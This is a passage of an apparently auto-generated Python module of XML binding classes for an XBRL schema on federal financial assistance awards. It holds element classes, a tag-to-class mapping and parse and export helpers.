already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
pass
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
pass
# end class foreverType
class arcroleRef(simpleType):
"""Definition of the roleRef element - used to link to resolve
xlink:arcrole attribute values to the arcroleType element
declaration. This attribute contains the arc role name."""
subclass = None
superclass = simpleType
def __init__(self, show=None, title=None, actuate=None, href=None, role=None, arcrole=None, type_=None, arcroleURI=None):
self.original_tagname_ = None
super(arcroleRef, self).__init__(show, title, actuate, href, role, arcrole, type_, )
self.arcroleURI = _cast(None, arcroleURI)
def factory(*args_, **kwargs_):
if arcroleRef.subclass:
return arcroleRef.subclass(*args_, **kwargs_)
else:
return arcroleRef(*args_, **kwargs_)
factory = staticmethod(factory)
def get_arcroleURI(self): return self.arcroleURI
def set_arcroleURI(self, arcroleURI): self.arcroleURI = arcroleURI
def hasContent_(self):
if (
super(arcroleRef, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='arcroleRef', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='arcroleRef')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='arcroleRef', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='arcroleRef'):
super(arcroleRef, self).exportAttributes(outfile, level, already_processed, namespace_, name_='arcroleRef')
if self.arcroleURI is not None and 'arcroleURI' not in already_processed:
already_processed.add('arcroleURI')
outfile.write(' arcroleURI=%s' % (quote_attrib(self.arcroleURI), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='arcroleRef', fromsubclass_=False, pretty_print=True):
super(arcroleRef, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('arcroleURI', node)
if value is not None and 'arcroleURI' not in already_processed:
already_processed.add('arcroleURI')
self.arcroleURI = value
super(arcroleRef, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
super(arcroleRef, self).buildChildren(child_, node, nodeName_, True)
pass
# end class arcroleRef
class roleRef(simpleType):
"""Definition of the roleRef element - used to link to resolve
xlink:role attribute values to the roleType element declaration.
This attribute contains the role name."""
subclass = None
superclass = simpleType
def __init__(self, show=None, title=None, actuate=None, href=None, role=None, arcrole=None, type_=None, roleURI=None):
self.original_tagname_ = None
super(roleRef, self).__init__(show, title, actuate, href, role, arcrole, type_, )
self.roleURI = _cast(None, roleURI)
def factory(*args_, **kwargs_):
if roleRef.subclass:
return roleRef.subclass(*args_, **kwargs_)
else:
return roleRef(*args_, **kwargs_)
factory = staticmethod(factory)
def get_roleURI(self): return self.roleURI
def set_roleURI(self, roleURI): self.roleURI = roleURI
def hasContent_(self):
if (
super(roleRef, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='roleRef', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='roleRef')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='roleRef', pretty_print=pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='roleRef'):
super(roleRef, self).exportAttributes(outfile, level, already_processed, namespace_, name_='roleRef')
if self.roleURI is not None and 'roleURI' not in already_processed:
already_processed.add('roleURI')
outfile.write(' roleURI=%s' % (quote_attrib(self.roleURI), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='roleRef', fromsubclass_=False, pretty_print=True):
super(roleRef, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
pass
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('roleURI', node)
if value is not None and 'roleURI' not in already_processed:
already_processed.add('roleURI')
self.roleURI = value
super(roleRef, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
super(roleRef, self).buildChildren(child_, node, nodeName_, True)
pass
# end class roleRef
class footnote(resourceType):
"""Definition of the reference resource element"""
subclass = None
superclass = resourceType
def __init__(self, role=None, title=None, type_=None, id=None, label=None, anytypeobjs_=None, valueOf_=None, mixedclass_=None, content_=None):
self.original_tagname_ = None
super(footnote, self).__init__(role, title, type_, id, label, valueOf_, mixedclass_, content_, )
if anytypeobjs_ is None:
self.anytypeobjs_ = []
else:
self.anytypeobjs_ = anytypeobjs_
self.valueOf_ = valueOf_
self.anyAttributes_ = {}
if mixedclass_ is None:
self.mixedclass_ = MixedContainer
else:
self.mixedclass_ = mixedclass_
if content_ is None:
self.content_ = []
else:
self.content_ = content_
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if footnote.subclass:
return footnote.subclass(*args_, **kwargs_)
else:
return footnote(*args_, **kwargs_)
factory = staticmethod(factory)
def get_anytypeobjs_(self): return self.anytypeobjs_
def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
def add_anytypeobjs_(self, value): self.anytypeobjs_.append(value)
def insert_anytypeobjs_(self, index, value): self._anytypeobjs_[index] = value
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def get_anyAttributes_(self): return self.anyAttributes_
def set_anyAttributes_(self, anyAttributes_): self.anyAttributes_ = anyAttributes_
def hasContent_(self):
if (
self.anytypeobjs_ or
self.valueOf_ or
super(footnote, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='footnote', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='footnote')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='footnote', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='footnote'):
unique_counter = 0
for name, value in self.anyAttributes_.items():
xsinamespaceprefix = 'xsi'
xsinamespace1 = 'http://www.w3.org/2001/XMLSchema-instance'
xsinamespace2 = '{%s}' % (xsinamespace1, )
if name.startswith(xsinamespace2):
name1 = name[len(xsinamespace2):]
name2 = '%s:%s' % (xsinamespaceprefix, name1, )
if name2 not in already_processed:
already_processed.add(name2)
outfile.write(' %s=%s' % (name2, quote_attrib(value), ))
else:
mo = re_.match(Namespace_extract_pat_, name)
if mo is not None:
namespace, name = mo.group(1, 2)
if name not in already_processed:
already_processed.add(name)
if namespace == 'http://www.w3.org/XML/1998/namespace':
outfile.write(' %s=%s' % (
name, quote_attrib(value), ))
else:
unique_counter += 1
outfile.write(' xmlns:%d="%s"' % (
unique_counter, namespace, ))
outfile.write(' %d:%s=%s' % (
unique_counter, name, quote_attrib(value), ))
else:
if name not in already_processed:
already_processed.add(name)
outfile.write(' %s=%s' % (
name, quote_attrib(value), ))
super(footnote, self).exportAttributes(outfile, level, already_processed, namespace_, name_='footnote')
def exportChildren(self, outfile, level, namespace_='finassist:', name_='footnote', fromsubclass_=False, pretty_print=True):
super(footnote, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
if not fromsubclass_:
for item_ in self.content_:
item_.export(outfile, level, item_.name, namespace_, pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
if node.text is not None:
obj_ = self.mixedclass_(MixedContainer.CategoryText,
MixedContainer.TypeNone, '', node.text)
self.content_.append(obj_)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
self.anyAttributes_ = {}
for name, value in attrs.items():
if name not in already_processed:
self.anyAttributes_[name] = value
super(footnote, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == '':
obj_ = __ANY__.factory()
obj_.build(child_)
obj_ = self.mixedclass_(MixedContainer.CategoryComplex,
MixedContainer.TypeNone, '', obj_)
self.content_.append(obj_)
if hasattr(self, 'add_'):
self.add_(obj_.value)
elif hasattr(self, 'set_'):
self.set_(obj_.value)
if not fromsubclass_ and child_.tail is not None:
obj_ = self.mixedclass_(MixedContainer.CategoryText,
MixedContainer.TypeNone, '', child_.tail)
self.content_.append(obj_)
super(footnote, self).buildChildren(child_, node, nodeName_, True)
# end class footnote
class reference(resourceType):
"""Definition of the reference resource element."""
subclass = None
superclass = resourceType
def __init__(self, role=None, title=None, type_=None, id=None, label=None, part=None, valueOf_=None, mixedclass_=None, content_=None):
self.original_tagname_ = None
super(reference, self).__init__(role, title, type_, id, label, valueOf_, mixedclass_, content_, )
if part is None:
self.part = []
else:
self.part = part
self.valueOf_ = valueOf_
if mixedclass_ is None:
self.mixedclass_ = MixedContainer
else:
self.mixedclass_ = mixedclass_
if content_ is None:
self.content_ = []
else:
self.content_ = content_
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if reference.subclass:
return reference.subclass(*args_, **kwargs_)
else:
return reference(*args_, **kwargs_)
factory = staticmethod(factory)
def get_part(self): return self.part
def set_part(self, part): self.part = part
def add_part(self, value): self.part.append(value)
def insert_part_at(self, index, value): self.part.insert(index, value)
def replace_part_at(self, index, value): self.part[index] = value
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def hasContent_(self):
if (
self.part or
self.valueOf_ or
super(reference, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='reference', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='reference')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='reference', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='reference'):
super(reference, self).exportAttributes(outfile, level, already_processed, namespace_, name_='reference')
def exportChildren(self, outfile, level, namespace_='finassist:', name_='reference', fromsubclass_=False, pretty_print=True):
super(reference, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
if not fromsubclass_:
for item_ in self.content_:
item_.export(outfile, level, item_.name, namespace_, pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
if node.text is not None:
obj_ = self.mixedclass_(MixedContainer.CategoryText,
MixedContainer.TypeNone, '', node.text)
self.content_.append(obj_)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
super(reference, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'part' and child_.text is not None:
valuestr_ = child_.text
obj_ = self.mixedclass_(MixedContainer.CategorySimple,
MixedContainer.TypeString, 'part', valuestr_)
self.content_.append(obj_)
if not fromsubclass_ and child_.tail is not None:
obj_ = self.mixedclass_(MixedContainer.CategoryText,
MixedContainer.TypeNone, '', child_.tail)
self.content_.append(obj_)
super(reference, self).buildChildren(child_, node, nodeName_, True)
# end class reference
class label(resourceType):
"""Definition of the label resource element."""
subclass = None
superclass = resourceType
def __init__(self, role=None, title=None, type_=None, id=None, label=None, anytypeobjs_=None, valueOf_=None, mixedclass_=None, content_=None):
self.original_tagname_ = None
super(label, self).__init__(role, title, type_, id, label, valueOf_, mixedclass_, content_, )
if anytypeobjs_ is None:
self.anytypeobjs_ = []
else:
self.anytypeobjs_ = anytypeobjs_
self.valueOf_ = valueOf_
self.anyAttributes_ = {}
if mixedclass_ is None:
self.mixedclass_ = MixedContainer
else:
self.mixedclass_ = mixedclass_
if content_ is None:
self.content_ = []
else:
self.content_ = content_
self.valueOf_ = valueOf_
def factory(*args_, **kwargs_):
if label.subclass:
return label.subclass(*args_, **kwargs_)
else:
return label(*args_, **kwargs_)
factory = staticmethod(factory)
def get_anytypeobjs_(self): return self.anytypeobjs_
def set_anytypeobjs_(self, anytypeobjs_): self.anytypeobjs_ = anytypeobjs_
def add_anytypeobjs_(self, value): self.anytypeobjs_.append(value)
def insert_anytypeobjs_(self, index, value): self._anytypeobjs_[index] = value
def get_valueOf_(self): return self.valueOf_
def set_valueOf_(self, valueOf_): self.valueOf_ = valueOf_
def get_anyAttributes_(self): return self.anyAttributes_
def set_anyAttributes_(self, anyAttributes_): self.anyAttributes_ = anyAttributes_
def hasContent_(self):
if (
self.anytypeobjs_ or
self.valueOf_ or
super(label, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='label', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='label')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='label', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='label'):
unique_counter = 0
for name, value in self.anyAttributes_.items():
xsinamespaceprefix = 'xsi'
xsinamespace1 = 'http://www.w3.org/2001/XMLSchema-instance'
xsinamespace2 = '{%s}' % (xsinamespace1, )
if name.startswith(xsinamespace2):
name1 = name[len(xsinamespace2):]
name2 = '%s:%s' % (xsinamespaceprefix, name1, )
if name2 not in already_processed:
already_processed.add(name2)
outfile.write(' %s=%s' % (name2, quote_attrib(value), ))
else:
mo = re_.match(Namespace_extract_pat_, name)
if mo is not None:
namespace, name = mo.group(1, 2)
if name not in already_processed:
already_processed.add(name)
if namespace == 'http://www.w3.org/XML/1998/namespace':
outfile.write(' %s=%s' % (
name, quote_attrib(value), ))
else:
unique_counter += 1
outfile.write(' xmlns:%d="%s"' % (
unique_counter, namespace, ))
outfile.write(' %d:%s=%s' % (
unique_counter, name, quote_attrib(value), ))
else:
if name not in already_processed:
already_processed.add(name)
outfile.write(' %s=%s' % (
name, quote_attrib(value), ))
super(label, self).exportAttributes(outfile, level, already_processed, namespace_, name_='label')
def exportChildren(self, outfile, level, namespace_='finassist:', name_='label', fromsubclass_=False, pretty_print=True):
super(label, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
if not fromsubclass_:
for item_ in self.content_:
item_.export(outfile, level, item_.name, namespace_, pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
self.valueOf_ = get_all_text_(node)
if node.text is not None:
obj_ = self.mixedclass_(MixedContainer.CategoryText,
MixedContainer.TypeNone, '', node.text)
self.content_.append(obj_)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
self.anyAttributes_ = {}
for name, value in attrs.items():
if name not in already_processed:
self.anyAttributes_[name] = value
super(label, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == '':
obj_ = __ANY__.factory()
obj_.build(child_)
obj_ = self.mixedclass_(MixedContainer.CategoryComplex,
MixedContainer.TypeNone, '', obj_)
self.content_.append(obj_)
if hasattr(self, 'add_'):
self.add_(obj_.value)
elif hasattr(self, 'set_'):
self.set_(obj_.value)
if not fromsubclass_ and child_.tail is not None:
obj_ = self.mixedclass_(MixedContainer.CategoryText,
MixedContainer.TypeNone, '', child_.tail)
self.content_.append(obj_)
super(label, self).buildChildren(child_, node, nodeName_, True)
# end class label
class calculationArc(arcType):
"""Extension of the extended link arc type for calculation arcs. Adds a
weight attribute to track weights on contributions to
summations."""
subclass = None
superclass = arcType
def __init__(self, use=None, from_=None, title_attr=None, show=None, arcrole=None, actuate=None, priority=None, to=None, type_=None, order=None, title=None, weight=None):
self.original_tagname_ = None
super(calculationArc, self).__init__(use, from_, title_attr, show, arcrole, actuate, priority, to, type_, order, title, )
self.weight = _cast(None, weight)
def factory(*args_, **kwargs_):
if calculationArc.subclass:
return calculationArc.subclass(*args_, **kwargs_)
else:
return calculationArc(*args_, **kwargs_)
factory = staticmethod(factory)
def get_weight(self): return self.weight
def set_weight(self, weight): self.weight = weight
def hasContent_(self):
if (
super(calculationArc, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='calculationArc', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='calculationArc')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='calculationArc', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='calculationArc'):
super(calculationArc, self).exportAttributes(outfile, level, already_processed, namespace_, name_='calculationArc')
if self.weight is not None and 'weight' not in already_processed:
already_processed.add('weight')
outfile.write(' weight=%s' % (quote_attrib(self.weight), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='calculationArc', fromsubclass_=False, pretty_print=True):
super(calculationArc, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('weight', node)
if value is not None and 'weight' not in already_processed:
already_processed.add('weight')
self.weight = value
super(calculationArc, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
super(calculationArc, self).buildChildren(child_, node, nodeName_, True)
pass
# end class calculationArc
class presentationArc(arcType):
"""Extension of the extended link arc type for presentation arcs. Adds
a preferredLabel attribute that documents the role attribute
value of preferred labels (as they occur in label extended
links)."""
subclass = None
superclass = arcType
def __init__(self, use=None, from_=None, title_attr=None, show=None, arcrole=None, actuate=None, priority=None, to=None, type_=None, order=None, title=None, preferredLabel=None):
self.original_tagname_ = None
super(presentationArc, self).__init__(use, from_, title_attr, show, arcrole, actuate, priority, to, type_, order, title, )
self.preferredLabel = _cast(None, preferredLabel)
def factory(*args_, **kwargs_):
if presentationArc.subclass:
return presentationArc.subclass(*args_, **kwargs_)
else:
return presentationArc(*args_, **kwargs_)
factory = staticmethod(factory)
def get_preferredLabel(self): return self.preferredLabel
def set_preferredLabel(self, preferredLabel): self.preferredLabel = preferredLabel
def hasContent_(self):
if (
super(presentationArc, self).hasContent_()
):
return True
else:
return False
def export(self, outfile, level, namespace_='finassist:', name_='presentationArc', namespacedef_='', pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='presentationArc')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='finassist:', name_='presentationArc', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='finassist:', name_='presentationArc'):
super(presentationArc, self).exportAttributes(outfile, level, already_processed, namespace_, name_='presentationArc')
if self.preferredLabel is not None and 'preferredLabel' not in already_processed:
already_processed.add('preferredLabel')
outfile.write(' preferredLabel=%s' % (quote_attrib(self.preferredLabel), ))
def exportChildren(self, outfile, level, namespace_='finassist:', name_='presentationArc', fromsubclass_=False, pretty_print=True):
super(presentationArc, self).exportChildren(outfile, level, namespace_, name_, True, pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('preferredLabel', node)
if value is not None and 'preferredLabel' not in already_processed:
already_processed.add('preferredLabel')
self.preferredLabel = value
super(presentationArc, self).buildAttributes(node, attrs, already_processed)
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
super(presentationArc, self).buildChildren(child_, node, nodeName_, True)
pass
# end class presentationArc
GDSClassesMapping = {
'federalFundingAmount': amountItemType,
'catalogOfFederalDomesticAssistanceProgram': catalogOfFederalDomesticAssistanceProgramComplexType,
'periodOfPerformancePotentialEndDate': dateItemType,
'treasuryAccountSymbol': TreasuryAccountSymbolComplexType,
'labelArc': arcType,
'awardeeInformation': awardeeInformationComplexType,
'simple': simpleType,
'highlyCompensatedOfficerFirstName': stringItemType,
'referenceArc': arcType,
'entity': contextEntityType,
'county': stringItemType,
'locator': locatorType,
'arc': arcType,
'awardDescription': stringItemType,
'highlyCompensatedOfficerLastName': stringItemType,
'awardeeAddress': addressComplexType,
'highlyCompensatedOfficer': highlyCompensatedOfficerComplexType,
'schemaRef': simpleType,
'loc': locatorType,
'ultimateParentUniqueIdentifier': integerItemType,
'awardeeUniqueIdentifierSupplemental': stringItemType,
'unitDenominator': measuresType,
'mainAccountNumber': integerItemType,
'title': titleType,
'typeOfTransactionCode': typeOfTransactionCodeItemType,
'recordType': recordTypeItemType,
'fundingSubTierAgency': agencyComplexType,
'agency': agencyComplexType,
'availabilityTypeCode': availableTypeCodeItemType,
'awardeeUniqueIdentifier': integerItemType,
'countryCode': stringItemType,
'modificationAmendmentNumber': stringItemType,
'streetAddress': streetAddressComplexType,
'subAccountSymbol': integerItemType,
'streetAddressLine': stringItemType,
'postalCode': stringItemType,
'awardingSubTierAgency': agencyComplexType,
'catalogOfFederalDomesticAssistanceTitle': stringItemType,
'awardeeLegalBusinessName': stringItemType,
'congressionalDistrict': congressionalDistrictItemType,
'periodOfPerformanceCurrentEndDate': dateItemType,
'officeIdentifier': integerItemType,
'businessType': businessTypeItemType,
'extended': extendedType,
'periodOfPerformance': periodOfPerformanceComplexType,
'unitNumerator': measuresType,
'city': stringItemType,
'officeName': stringItemType,
'awardingAgency': agencyComplexType,
'highlyCompensatedOfficerMiddleInitial': stringItemType,
'award': awardComplexType,
'period': contextPeriodType,
'countryName': stringItemType,
'ultimateParentLegalBusinessName': stringItemType,
'awardAmounts': awardAmountsComplexType,
'state': stateItemType,
'agencyOffice': agencyOfficeComplexType,
'periodOfPerformanceStartDate': dateItemType,
'address': addressComplexType,
'periodOfPerformanceActionDate': dateItemType,
'primaryPlaceOfPerformance': addressComplexType,
'nonFederalFundingAmount': amountItemType,
'beginningPeriodOfAvailability': stringItemType,
'typeOfAction': typeOfActionItemType,
'fundingAgency': agencyComplexType,
'forever': foreverType,
'identifier': identifierType,
'resource': resourceType,
'agencyName': stringItemType,
'scenario': contextScenarioType,
'parentAwardID': stringItemType,
'endingPeriodOfAvailability': stringItemType,
'allocationTransferAgencyIdentifier': integerItemType,
'zipCodePlus4': stringItemType,
'documentation': documentationType,
'highlyCompensatedOfficerCompensation': amountItemType,
'catalogOfFederalDomesticAssistanceNumber': stringItemType,
'totalFundingAmount': amountItemType,
'agencyIdentifier': integerItemType,
'awardID': stringItemType,
'definitionArc': arcType,
'footnoteArc': arcType,
}
USAGE_TEXT = """
Usage: python <Parser>.py [ -s ] <in_xml_file>
"""
def usage():
print(USAGE_TEXT)
sys.exit(1)
def get_root_tag(node):
tag = Tag_pattern_.match(node.tag).groups()[-1]
rootClass = GDSClassesMapping.get(tag)
if rootClass is None:
rootClass = globals().get(tag)
return tag, rootClass
def parse(inFileName, silence=False):
parser = None
doc = parsexml_(inFileName, parser)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'awardComplexType'
rootClass = awardComplexType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
if not silence:
sys.stdout.write('<?xml version="1.0" ?>\n')
rootObj.export(
sys.stdout, 0, name_=rootTag,
namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"',
pretty_print=True)
return rootObj
def parseEtree(inFileName, silence=False):
parser = None
doc = parsexml_(inFileName, parser)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'awardComplexType'
rootClass = awardComplexType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
mapping = {}
rootElement = rootObj.to_etree(None, name_=rootTag, mapping_=mapping)
reverse_mapping = rootObj.gds_reverse_node_mapping(mapping)
if not silence:
content = etree_.tostring(
rootElement, pretty_print=True,
xml_declaration=True, encoding="utf-8")
sys.stdout.write(content)
sys.stdout.write('\n')
return rootObj, rootElement, mapping, reverse_mapping
def parseString(inString, silence=False):
from StringIO import StringIO
parser = None
doc = parsexml_(StringIO(inString), parser)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'awardComplexType'
rootClass = awardComplexType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
if not silence:
sys.stdout.write('<?xml version="1.0" ?>\n')
rootObj.export(
sys.stdout, 0, name_=rootTag,
namespacedef_='xmlns:finassist="http://www.xbrl.org/int/finassist/2006-10-25"')
return rootObj
def parseLiteral(inFileName, silence=False):
parser = None
doc = parsexml_(inFileName, parser)
rootNode = doc.getroot()
rootTag, rootClass = get_root_tag(rootNode)
if rootClass is None:
rootTag = 'awardComplexType'
rootClass = awardComplexType
rootObj = rootClass.factory()
rootObj.build(rootNode)
# Enable Python to collect the space used by the DOM.
doc = None
if not silence:
sys.stdout.write('#from finassist import *\n\n')
sys.stdout.write('import finassist as model_\n\n')
sys.stdout.write('rootObj = model_.rootClass(\n')
rootObj.exportLiteral(sys.stdout, 0, name_=rootTag)
sys.stdout.write(')\n')
return rootObj
def main():
args = sys.argv[1:]
if len(args) == 1:
parse(args[0])
else:
usage()
if __name__ == '__main__':
#import pdb; pdb.set_trace()
main()
__all__ = [
"NCNameItemType",
"NameItemType",
"QNameItemType",
"TreasuryAccountSymbolComplexType",
"accountPurposeCodeItemType",
"accountTypeItemType",
"addressComplexType",
"agencyComplexType",
"agencyOfficeComplexType",
"amountItemType",
"anyURIItemType",
"arcType",
"arcroleRef",
"arcroleType",
"availableTypeCodeItemType",
"awardAmountsComplexType",
"awardComplexType",
"awardeeInformationComplexType",
"base64BinaryItemType",
"bookTaxDifferenceItemType",
"booleanItemType",
"businessTypeItemType",
"byteItemType",
"calculationArc",
"calculationLink",
"catalogOfFederalDomesticAssistanceProgramComplexType",
"congressionalDistrictItemType",
"context",
"contextEntityType",
"contextPeriodType",
"contextScenarioType",
"dateItemType",
"dateTimeItemType",
"debitCreditCodeItemType",
"decimalItemType",
"definitionLink",
"divide",
"documentTypeItemType",
"documentationType",
